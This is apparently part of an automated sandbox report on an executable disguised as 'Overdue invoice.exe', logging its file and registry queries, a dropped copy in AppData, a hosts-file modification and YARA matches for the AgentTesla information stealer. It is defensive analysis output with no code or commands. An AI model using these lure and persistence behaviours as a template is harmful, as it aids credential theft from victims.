                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Users\user\Desktop\Overdue invoice.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Modifies the hosts file
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 16.2.yqWDN.exe.3de2e78.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.0.yqWDN.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.0.yqWDN.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.yqWDN.exe.3de2e78.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.Overdue invoice.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.Overdue invoice.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.yqWDN.exe.3e72e78.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.Overdue invoice.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.yqWDN.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.0.yqWDN.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.Overdue invoice.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.0.yqWDN.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.Overdue invoice.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.0.yqWDN.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Overdue invoice.exe.3ac2e78.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.Overdue invoice.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.yqWDN.exe.3e72e78.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.yqWDN.exe.3d8e3f8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.yqWDN.exe.3cfe3f8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Overdue invoice.exe.3ac2e78.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Overdue invoice.exe.39de3f8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000013.00000000.366458580.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.519470076.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000000.294988702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000000.295945880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000000.366994504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000000.295465407.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000000.294210578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.378013888.0000000003CEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000000.365073156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000000.365965578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.519516875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.302129408.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.373874318.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.300706050.000000000393F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
